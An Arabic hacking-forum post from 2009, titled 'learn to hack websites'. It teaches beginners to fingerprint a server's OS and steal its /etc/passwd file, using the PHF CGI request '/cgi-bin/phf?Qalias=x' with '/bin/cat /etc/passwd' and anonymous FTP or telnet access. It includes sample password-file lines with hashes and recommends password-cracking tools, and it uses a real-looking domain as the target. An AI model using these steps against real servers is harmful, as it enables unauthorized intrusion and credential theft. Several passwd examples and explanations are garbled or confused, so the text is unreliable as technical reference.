عرض مشاركة واحدة
قديم 12-10-2009, 02:27 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
lode-hacker
 
الصورة الرمزية lode-hacker
 

 

 
إحصائية العضو





lode-hacker غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
lode-hacker is on a distinguished road

.......... تعلم اختراق المواقع!!!!!!!!


ختراق المواقع ماهو الا شئ بسيط ، نعم بسيط ولكن في حاله واحده وهي أن تتعرف على نظام التشغيل لسيرفر وهي مسأله في غايه البساطه والأمر الثاني ان تكون عالما بالثغرات الموجوده فيه ، وتكون المسأله صعبه إذا كنت تريد تريد إختراق مواقع كبيره ومشهوره ولها هيبه وحمايه عاليه حيث أنك في هذه الحاله سوف تنسى الثغرات الموجوده عندك عن النظام الخادم لهذا الموقع لأن وبالتأكيد قد رقعت وعليك أن تفكر في إكتشاف ثغره في هذا الموقع لتخترقه وهذه الناحيه لن أتحدث عنها لأني لا أعرفها ، ولكن سوف نتحدث عن البيسك سيرفر هو السيرفر الخادم لأكثر المواقع العربيه وهو سيرفر بسيط في الحمايه ,,,
لإختراق هذا النوع من السيرفرات عليك التعرف على نظام التشغيل له ويتم ذلك من عده طريق لتعرف عليه
مثلا نريد اختراق الموقع
www.kondor.com
وهذا موقع ليس مجاني بل هو نطاق له سيرفره ورقم آي بي ثابت وهذا شئ معلوم لدى الجميع
نرسل رساله الى عنوان بريدي خاطئ الى هذا السيرفر وسوف يرد عليك بأن هذا البريد غير موجود في الموقع والبريد مثلا هو
hgguutujfkerh@kondor.com
وهو بالفعل غير موجود في الموقع عنوان بريد بالإسم هذا ، من خلال الرساله التي وصلتك تخبركبأن عنوان البريد هذا غير موجود تستطيع التعرف من خلالها على نظام الموقع ، وهذه واحده من الطرق
ثانيا عليك الآن وبعد معرفه نظام التشغيل لهذا الموقع أن تبحث عن الثغرات له
////////////
////////////
ملاحظه مهمه
////////////
////////////
قد يخترق أحد المواقع ويكون السبب ليس نظام التشغيل ، بل يكون أحد البرامج المثبته عليه مثل ملفات سي حي آي وقد تستخدم لجلب ملف الباسورد المسمى دائما بـ passwd وهناك حادثه مثل هذه في إصدارات WWWThreads للمنتديات

/////////////////////////////////////////////////

لنفرض انك تبي تخترق سيرفر بسيط وقليل الأمن وهذا النوع منتشر بكثره بكثره نعم بكثره ، عندها سوف يكون إختراق هذا النوع والحصول على الباسورد فايل امر في غايه البساطه نعم في غايه البساطه ولاداعي بعد ان تخترق بأن تقول لمن يطلب منك جواب لسؤال .. كيف ؟ ان ترد عليه بأن العمليه معقده وهذا الرد كاذب
مثلا أدخل على السيرفر في وضع التخفي
anonymously (( إستخدم التلنت في هذه الخطوه ))
وانظر الى المجلد المسمى بـ
etc
وأطلب الملف
passwd
هل رأيت ... هي عمليه بسيطه ولكن قف ! الملف يحتوي على كلم السر الخاصه بالموقع وغسماء المستخدمين للسيرفر وكلماتهم السريه ولكن كلماتهم السريه تكون مشفره
طريقه أخرى لإختراق هذا النوع من السيرفرات
أبحث في الموقع المستهدف من خلال المتصفح عن يا ترى وجود سي جي آي
عند توفره أطلب الملف التالي
cgi-bin/phf?Qalias=x
/bin/cat /etc/passwd
مثلا عنوان الموقع هو
www.kondor.com
نكتب هكذا
www.kondor.com/cgi-bin/phf?Qalias=x
/bin/cat /etc/passwd
عندها سوف يرسل لك الملف
passwd
وسوف يكون في الملف إسماء وكلمات السر المرخص لهم دخول السيرفر ولكن قف هناك أمر حيرني كثيرا وجاب لي الصداع وحيث اني ذهبت لتصميم برامج لفك التشفير عن كلمات السر فهي مشفره وأنتهى الأمر بي البرنامج الذي صمم على يد أحدهم !

الآن سوف أضع أسئله وأجوبه لتسهل الفهم
س: ما الملف
passwd
وهل الحصول عليها يعتبر من الأشياء المسموح عرضها ؟
ج: الملف
passwd
يحتوي كلمات السر وأسماء المستخدمين المسموح لهم دخول جهاز السيرفر وهو غير مسموح بعرضه ولكن هناك ثغرات وطرق ذكرنا بعضها أو القليل منا وسوف نذكر أكثر ، المهم عند حصولك على الملف سوف تشاهد مكتوب فيه هكذا مثلا


Sources Code - شفرة

root:x:00000-Admin(0000):/:/bin/ksh
daemon:x1:0000-Admin(0000):/:
bin:x2:0000-Admin(0000):/usr/bin:
listen:x:37Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101
FTPUser:/export/home/ftp:
kondor:yu&rte6745kdRichardClark:/export/home/kondor



إحنا علينا من السطر هذا
kondor:yu&rte6745kdRichardClark:/export/home/kondor
ولتفسيره نقول بأن
إسم المستخدم هو
kondor
وكلمه السر المشفره .. حط خطين تحت كلمه مشفره هي
yu&rte6745kd
وايضا
User number: 201
Group Number: 4
Real Name (usually): Richard Clark
Home Directory: /export/home/rrc
Type of Shell: /bin/ksh
الآن فهمنا ماذ يعني السطر هذا السطر من الملف passwd
kondor:yu&rte6745kdRichardClark:/export/home/kondor

حاولت أن تعرف من هذه شئ
admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7m9I:0:0:
Regular Admin login:/admin:/sbin/sh
bin:*2:Admin :/bin:
sys:*3:Admin :/usr/src:
adm:*4:Admin :/usr/adm:/sbin/sh
daemon:*1: Daemon Login for daemons needing
nobody:*:65534:65534::/:
ftp:*:39:39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh
س : هل اي ثغره تنجح ؟
ج : لا طبعا ، لابد ان تكون عارفا لأي شئ هذه الثغره ولأي نظام تشغيل وهل يلزم أن يكون مع نظام التشغيل برنامج آخر ليتم الدخول على السيرفر أو على الروت ، وكل هذه المعلومات لابد من توفرها
مثلا الموقع alsahat.net يعمل على نظام لينكس
وقد يكون لثغره أن سبق ورقعت
س : هل يختلف تشفير كلمه السر من نظام لآخر ؟
ج : هذا شئ أكيد ...
س : هل هناك برامج مخصصه لكلمات السر لكل نظام ؟
ج : نعم ، مثلا برنامجي المفضل لكسر شفرات الكلمات السريه (passwd) لنظام يونكس هو Brute ولكن للأسف أنا لا أملكه الآن وهناك برنامج آخر قد يكون أفضل من سابقه وهو Cracker Jack 1.4
)(
إعذروني لن كان كلامي مو مرتب
)(




شكل الكلام والله مو مرتب ... عشان كذا بعيد أكتب لكم بتعمق أكثر والكلام اللي فوق هذا مجرد مقدمه
بكتب بالعاميه ازين لي ولكم
مو لازم تعرف الكلام الي سبق ذكرته لكن إفهم منه جواب السؤال :: كيف يتم :: فقط

=== نبداء من هنا وبعمق ===
عرفنا ان الملف
(سوف نسميه من الآن بإسم ملف الباسورد )passwd file
يحتوي على إسماء المستخدمين المرخص لهم الدخول الى السيرفر وكلماتهم السريه وعرفنا أيضا أنها مشفره ولكن ضع كل تفكيره في الحصول على ملف الباسورد وأترك كيفت كسر التشفير في النهايه فهي تعتبر بسيطه
فمتو كل اللي راح ,,,, تمام

إستغلال الثغرات
اولا ما هي الثغرات ,,, الثغرات هي حفر وهفوات في السفت وير فقط وتمكن أي شخص من الحصول على ماعلمومات أو نشر فيروسات من خلال هذه الثغره
من ضمن هذه الثغرات ، ثغره سبق وذكرتها لكم في هذا المقال وهي في ملفات السي جي آي واستخدمناها لإختراق الموقع
www.kondor.com
ونورد عنها الآن تفاصيل
تسمى هذه الثغره الأمنيه بـ
PHF
ومعظم السيرفرات تمتلك هذه الثغره والى الآن لم يتم رقعها مع الأسف (إذا وجد عنده سي جي آي فقط ) !:! إذا نجحت هذه الثغره فسوف يعرض لك ملف الباسورد ، زي هذا مثلا

Sources Code - شفرة


root:x:00000-Admin(0000):/:/bin/ksh
daemon:x1:0000-Admin(0000):/:
bin:x2:0000-Admin(0000):/usr/bin:
listen:x:37Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101
FTPUser:/export/home/ftp:
kondor:yu&rte6745kdRichardClark:/export/home/kondor





كما ذكرنا سابقن (كتابه سابقاً هكذا سابقن أفضل ) لووول
أحفظ الملف في تكست او مستند نص عشان تسوي له عمليات لكسر التشفير

FTP Passwd
بعض السيرفرات تحفظ ملف الباسورد في الإف تي بي نفسه ، أي تستطيع الى حد بعيد أن تحصل على ملف الباسورد من خلال دخولك في وصع مخفي
anonymous logins
والدخول بالوضع الخفي شئ قانوني ، وتسحب ملف الباسورد من الهدف المحدد ، غستخدم احد هذه البرامج لهمل ذلك
WS FTP or CuteFTP
وبعد ماتدخل بالوضع الخفي راح تجيك لسته أو قائمه
إختر منها
etc
وراح يعرض لك عدد قليل من الملفات مثل هذا
"group, passwd"
وملف الباسورد مو شرط يكون إسمه
passwd
ممكن يكون غير كذا .. المهم أنت أسحبه وإفتحه ولو شفت إسم مثل
"root, daemon, FTP, nobody, ftplogin, bin"
وإذا لقيت بالقرب من هذه الكلمات رمز نجمه كهذه * وقد رمز آخر مثل علامه إكس فقط ، لن ينفعك الإستعانه بأحد الكراكر ولكن كل ماعليك أن تتعقب الباسورد ويجب ان تبحث لحل لهذه المشكله فأنا حتى تحصل على مثل هذا
"joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"
والآن إستعن بأحد الكراكر لكسر كلمة السر او حاول عن طريق البرامج الذي ذكرتها لك سابقن

س : ماهو إسم المستخد هنا وماهي كلمة السر المشفره ؟
جاوب أنت .... !:!

التعقب لملف الباسورد
الآن وبعد أن حصلت على مثل هذا
"joetest:*:102:100::/home/joetest:/usr/bin/restsh"
فأنت الآن تملك
shadowed passwd
فهذا يتدلى في نظام التشفيل ولكن الـ
passwd file
يختلف (لا داعي لتعمق اكثر ) والملف
passwd file
هو الذي نجد كلمة السر فيه مشفره وليست رمز واحد مثل * أو x
و الـ
shadow file
يكون مكان كلمة السر نجمه أو رمز
وأنا الى الآن لست متأكد من هذه النقطه

انا الحين تعبت من الكتابه ،، اتمنى أنكم طلعتو بفايده



jugl hojvhr hgl,hru!!!!!!!!

   

رد مع اقتباس